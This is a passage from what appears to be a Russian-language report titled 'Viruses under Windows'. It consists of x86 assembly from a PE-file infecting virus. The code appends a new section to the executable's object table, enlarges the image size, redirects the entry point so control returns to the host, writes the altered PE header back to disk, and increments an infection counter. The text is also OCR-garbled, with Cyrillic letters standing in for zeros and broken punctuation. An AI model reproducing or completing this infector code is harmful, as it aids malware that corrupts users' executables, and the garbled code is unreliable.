Доклад: Вирусы под Windows

mov dword ptr [ebp+offset physicaloffset],eax

[Обновим размер образа (размер в памяти) файла

mov eax,vend-vstart+1000h

add eax,dword ptr [ebp+offset imagesize]

mov ecx, [ebp+offset objalign]

xor edx.edx

div ecx

inc eax

mul ecx

mov dword ptr [ebp+offset imagesize],eax

.Скопируем новый объект в таблицу объектов

mov ecx, 10

rep movsd

[Вычислим точку входа RVA

mov eax.dword ptr [ebp+offset RVA]

mov ebx.dword ptr [ebp+offset entrypointRVA]

mov dword ptr [ebp+offset entrypointRVA],eax

sub eax.ebx

add eax,5

[Установим значение, необходимое для возврата в носитель
mov dword ptr [ebp+offset subme],eax

[Поставим указатель позиции чтения/записи на начало РЕ-заголовка
push О
push О

push dword ptr [ebp+offset peheaderoffset]
push dword ptr [ebp+offset ahand]
call SetFilePointer

[Запишем РЕ-заголовок и таблицу объектов в файл
push О

lea eax, [ebp+offset bytesread]
push eax

push dword ptr [ebp+offset headersize]
lea eax, [ebp+offset peheader]
push eax

push dword ptr [ebp+offset ahand]
call WriteFile

[Увеличим счетчик заражений

inc byte ptr [ebp+offset countinfect]

[Поставим указатель позиции чтения/записи
;по физическому смещению нового объекта

push О